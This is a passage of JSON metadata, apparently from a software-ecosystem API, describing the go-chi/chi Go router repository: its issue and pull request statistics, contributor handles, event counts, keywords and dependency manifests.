able":{"full_name":"go-chi/chi","html_url":"https://github.com/go-chi/chi","last_synced_at":"2026-08-11T01:34:31.613Z","status":null,"issues_count":174,"pull_requests_count":266,"avg_time_to_close_issue":13363555.936363636,"avg_time_to_close_pull_request":9412796.65625,"issues_closed_count":110,"pull_requests_closed_count":191,"pull_request_authors_count":142,"issue_authors_count":162,"avg_comments_per_issue":3.103448275862069,"avg_comments_per_pull_request":0.9210526315789473,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":14,"past_year_pull_requests_count":83,"past_year_avg_time_to_close_issue":2096611.5454545454,"past_year_avg_time_to_close_pull_request":2445516.9555555554,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":45,"past_year_pull_request_authors_count":53,"past_year_issue_authors_count":13,"past_year_avg_comments_per_issue":1.6428571428571428,"past_year_avg_comments_per_pull_request":0.5060240963855421,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"created_at":"2023-05-16T03:49:44.349Z","updated_at":"2026-08-12T10:59:39.929Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","issue_labels_count":{"table":{"v6":3,"routing":3,"help wanted":2,"url-params":1,"review":1}},"pull_request_labels_count":{"table":{"v6":3,"routing":2,"review":1}},"issue_author_associations_count":{"table":{"NONE":161,"CONTRIBUTOR":9,"MEMBER":4}},"pull_request_author_associations_count":{"table":{"NONE":141,"CONTRIBUTOR":113,"MEMBER":11,"OWNER":1}},"issue_authors":{"table":{"pkieltyka":4,"mahesh-riddles":2,"frederikhors":2,"alexedwards":2,"bentcoder":2,"mmmmmrob":2,"comdiv":2,"queelius":2,"costela":2,"nawa":2,"der-eismann":1,"koote":1,"weeco":1,"tracplus-hpaterson":1,"surakshith-suvarna":1,"unext-wendong":1,"jzillmann":1,"cixel":1,"kateile":1,"TomOne":1,"betonetotbo":1,"iwilltry42":1,"adam-p":1,"sonatard":1,"HosMercury":1,"jtuchel":1,"ryanfkeepers":1,"luca147":1,"PumpkinSeed":1,"dadatawajue":1,"qeatzy":1,"lfama":1,"it512":1,"mhghw":1,"wagnerww":1,"titpetric":1,"lhinderberger":1,"JensRantil":1,"ptman":1,"BubbaJoe":1,"pd93":1,"IDispose":1,"SoulPancake":1,"iliesh":1,"lukasmalkmus":1,"VakarisZ":1,"mason-liu":1,"sethgrid":1,"fuadarradhi":1,"tandem97":1,"LeanderGangso":1,"bclements":1,"WestleyK":1,"nagygr":1,"FarmerChillax":1,"sauerbraten":1,"thehaung":1,"dgr237":1,"masseelch":1,"jez321":1,"sumia01":1,"trevorprater":1,"advanderveer":1,"ChronosMasterOfAllTime":1,"cespedes":1,"esenmx":1,"seal":1,"wsw0108":1,"benc-uk":1,"riandyrn":1,"MrXu":1,"dennisvanderweide":1,"djui":1,"Rahulbeniwal26119":1,"y-yu":1,"verdel":1,"jaytxrx":1,"mo-rieger":1,"vorotech":1,"knbr13":1,"aadi-1024":1,"zak905":1,"wolfogre":1,"mateors":1,"Nyoroon":1,"mmukahhal-tibco":1,"VojtechVitek":1,"bekabaz":1,"lesichkovm":1,"farazfazli":1,"JouleYuan":1,"catatsuy":1,"shettyh":1,"kamalkech":1,"joaoschoen":1,"HaoweiCh":1,"praveingk":1,"iamsubrataaich":1,"shunfeng8421":1,"samhza":1,"ousloob":1,"Renizmy":1,"ezraisw":1,"Pe-te":1,"pboguslawski":1,"elevran":1,"bronger":1,"romain-tadiello":1,"kvnxiao":1,"helios741":1,"klingtnet":1,"msbit":1,"jdelk":1,"williamhjcho":1,"pedrospdc":1,"sujit-baniya":1,"HarryChopra":1,"ribice":1,"ilijaivanov":1,"jwafle":1,"soheilrt":1,"angelofallars":1,"jawnsy":1,"carmo-evan":1,"emaborsa":1,"bohrasankalp":1,"intel352":1,"kei2100":1,"ebabani":1,"tomqwpl":1,"thinkgos":1,"KN4CK3R":1,"thanosgn":1,"valsor":1,"yurineydachin":1,"mx-psi":1,"AlexVasiluta":1,"Andrei-hub11":1,"yurivish":1,"omikronsc":1,"mvrlin":1,"fspaniol":1,"dils2k":1,"darienmiller88":1,"bigusef":1,"Edenshaw":1,"bshrram":1,"flimzy":1,"luweimy":1,"shamilovstas":1,"samiponkanenssh":1,"rashmi-tondare":1,"gustavoquintana-peya":1,"picklejw":1,"eteran":1,"Dirbaio":1,"djensen47":1,"mikebionic":1,"aep":1,"JRaspass":1,"cxjava":1,"franigam":1}},"pull_request_authors":{"table":{"VojtechVitek":16,"pkieltyka":11,"JRaspass":8,"sonnemusk":7,"happysnaker":7,"alexandear":5,"wyf027":5,"GocaMaric":4,"6543":4,"angelofallars":4,"marcofranssen":4,"pixel365":4,"c-tonneslan":4,"Neurostep":4,"costela":3,"thedevsaddam":3,"scop":3,"vasayxtx":3,"joeriddles":3,"TheRandomCharacter":3,"rouzier":2,"OtavioBernardes":2,"m1k1o":2,"l2dy":2,"ezraisw":2,"mmukahhal-tibco":2,"k-vanio":2,"noazaj":2,"rodneyosodo":2,"sglkc":2,"shedyfreak":2,"tchssk":2,"Spartan09":2,"mithileshgupta12":2,"nathannewyen":2,"purificant":2,"cxjava":2,"queelius":2,"Lutherwaves":2,"hongkuancn":2,"ydarb":2,"andrewstellman":2,"aadi-1024":2,"juburr":2,"wolfogre":2,"JeaNile":2,"alliasgher":2,"romain-tadiello":2,"catatsuy":2,"c2h5oh":2,"n33pm":2,"shettyh":2,"mrdomino":2,"AntonC9018":2,"szinn":2,"gaiaz-iusipov":2,"patrislav":2,"robsonpeixoto":2,"ousloob":2,"LeSingh1":1,"Gusted":1,"matterpale":1,"bigwheel":1,"XananasX7":1,"deepakganesh78":1,"Emil-Ka":1,"DucMinhNe":1,"acme":1,"kmg0308":1,"boatnoah":1,"MatthewWaanders":1,"leno23":1,"saitejabandaru-in":1,"canolgun":1,"bronger":1,"veeceey":1,"Danielecina":1,"Kais12349":1,"arp242":1,"Solaris-star":1,"zHenriqueGN":1,"amitmishra11":1,"srpvpn":1,"helios741":1,"luca147":1,"jpalafox-12":1,"puneetdixit200":1,"kei2100":1,"Saku0512":1,"kubosuke":1,"Bahtya":1,"willnorris":1,"curio77":1,"sm3142":1,"efraimbart":1,"fatelei":1,"lesichkovm":1,"ggicci":1,"boinger":1,"adisetiawanx":1,"LukasJenicek":1,"ImpulseB23":1,"mustafapc":1,"JinRudy":1,"EwenQuim":1,"jtams":1,"lihan3238":1,"72sevenzy2":1,"falentio":1,"bichanna":1,"BlakeWilliams":1,"mayank-dev-15":1,"eteran":1,"Ojasvi-Poonia":1,"GamerGirlandCo":1,"Kazetsukai":1,"michalbric":1,"AthfanFasee":1,"testwill":1,"doganarif":1,"wsw0108":1,"cixel":1,"aniaan":1,"bernardopericacho":1,"fheikens":1,"keribend":1,"pjol":1,"mikereid1":1,"gouwazi":1,"maxtaran2010":1,"golamrabbiazad":1,"jdmaguire":1,"SergeyPodgornyy":1,"YlanzinhoY":1,"greymoth-jp":1,"nuuls":1,"Taaipi":1,"gromms":1,"jolheiser":1,"nchengyeeshen":1,"p53":1,"farazfazli":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-08-13T00:00:06.201Z","repositories_count":16027599,"issues_count":40496203,"pull_requests_count":130966956,"authors_count":11441745,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{}},"past_year_pull_request_labels_count":{"table":{}},"past_year_issue_author_associations_count":{"table":{"NONE":12,"CONTRIBUTOR":2}},"past_year_pull_request_author_associations_count":{"table":{"NONE":56,"CONTRIBUTOR":27}},"past_year_issue_authors":{"table":{"queelius":2,"bekabaz":1,"cixel":1,"der-eismann":1,"picklejw":1,"ptman":1,"Rahulbeniwal26119":1,"rashmi-tondare":1,"shunfeng8421":1,"thanosgn":1,"trevorprater":1,"VojtechVitek":1,"wsw0108":1}},"past_year_pull_request_authors":{"table":{"sonnemusk":7,"happysnaker":7,"wyf027":5,"VojtechVitek":5,"c-tonneslan":4,"JRaspass":3,"nathannewyen":2,"alliasgher":2,"andrewstellman":2,"OtavioBernardes":2,"queelius":2,"mustafapc":1,"mayank-dev-15":1,"maxtaran2010":1,"LukasJenicek":1,"lihan3238":1,"LeSingh1":1,"leno23":1,"kmg0308":1,"Ojasvi-Poonia":1,"pjol":1,"puneetdixit200":1,"saitejabandaru-in":1,"Saku0512":1,"scop":1,"Solaris-star":1,"veeceey":1,"wsw0108":1,"XananasX7":1,"72sevenzy2":1,"acme":1,"adisetiawanx":1,"amitmishra11":1,"Bahtya":1,"BlakeWilliams":1,"boatnoah":1,"boinger":1,"canolgun":1,"cixel":1,"Danielecina":1,"deepakganesh78":1,"doganarif":1,"DucMinhNe":1,"Emil-Ka":1,"fheikens":1,"GamerGirlandCo":1,"gouwazi":1,"greymoth-jp":1,"ImpulseB23":1,"jdmaguire":1,"JinRudy":1,"jpalafox-12":1,"Kais12349":1}},"maintainers":[{"table":{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"}},{"table":{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}}],"active_maintainers":[]}},"events":{"total":{"ReleaseEvent":3,"DeleteEvent":5,"PullRequestEvent":64,"ForkEvent":100,"DiscussionEvent":2,"IssuesEvent":38,"WatchEvent":2607,"IssueCommentEvent":106,"PushEvent":31,"PullRequestReviewCommentEvent":37,"PullRequestReviewEvent":57,"CreateEvent":9},"last_year":{"ReleaseEvent":1,"DeleteEvent":2,"PullRequestEvent":24,"ForkEvent":28,"DiscussionEvent":2,"IssuesEvent":10,"WatchEvent":702,"IssueCommentEvent":30,"PushEvent":18,"PullRequestReviewCommentEvent":8,"PullRequestReviewEvent":12,"CreateEvent":3}},"keywords":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/ci.yml","sha":null,"kind":"manifest","created_at":"2023-10-20T20:02:15.410Z","updated_at":"2023-10-20T20:02:15.410Z","repository_link":"https://github.com/go-chi/chi/blob/master/.github/workflows/ci.yml","dependencies":[{"id":14267915844,"package_name":"actions/setup-go","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14267915845,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"go","filepath":"_examples/rest/go.mod","sha":null,"kind":"manifest","created_at":"2023-10-20T20:02:16.101Z","updated_at":"2023-10-20T20:02:16.101Z","repository_link":"https://github.com/go-chi/chi/blob/master/_examples/rest/go.mod","dependencies":[{"id":14267915846,"package_name":"github.com/go-chi/chi/v5","ecosystem":"go","requirements":"v5.0.1","direct":true,"kind":"runtime","optional":false},{"id":14267915847,"package_name":"github.com/go-chi/docgen","ecosystem":"go","requirements":"v1.2.0","direct":true,"kind":"runtime","optional":false},{"id":14267915848,"package_name":"github.com/go-chi/render","ecosystem":"go","requirements":"v1.0.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"go","filepath":"_examples/rest/go.sum","sha":null,"kind":"lockfile","created_at":"2023-10-20T20:02:16.153Z","updated_at":"2023-10-20T20:02:16.153Z","repository_link":"https://github.com/go-chi/chi/blob/master/_examples/rest/go.sum","dependencies":[{"id":14267915849,"package_name":"github.com/go-chi/chi/v5","ecosystem":"go","requirements":"v5.0.1","direct":false,"kind":"runtime","optional":false},{"id":14267915850,"package_name":"github.com/go-chi/docgen","ecosystem":"go","requirements":"v1.2.0","direct":false,"kind":"runtime","optional":false},{"id":14267915851,"package_name":"github.com/go-chi/render","ecosystem":"go","requirements":"v1.0.1","direct":false,"kind":"runtime","optional":false},{"id":14267915852,"package_name":"gopkg.in/check.v1","ecosystem":"go","requirements":"v0.0.0-20161208181325-20d25e280405","direct":false,"kind":"runtime","optional":false},{"id":14267915853,"package_name":"gopkg.in/yaml.v2","ecosystem":"go","requirements":"v2.4.0","direct":false,"kind":"runtime","optional":false}]},{"ecosystem":"go","filepath":"go.mod","sha":null,"kind":"manifest","created_at":"2023-10-20T20:02:16.163Z","updated_at":"2023-10-20T20:02:16.163Z","repository_link":"https://github.com/go-chi/chi/blob/master/go.mod","dependencies":[]}],"score":37.15509922743967,"created_at":"2026-07-08T07:13:21.753Z","updated_at":"2026-08-13T02:32:36.354Z","avatar_url":"https://github.com/go-chi.png","language":"Go","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/378168","html_url":"https://summary.ecosyste.ms/projects/378168"}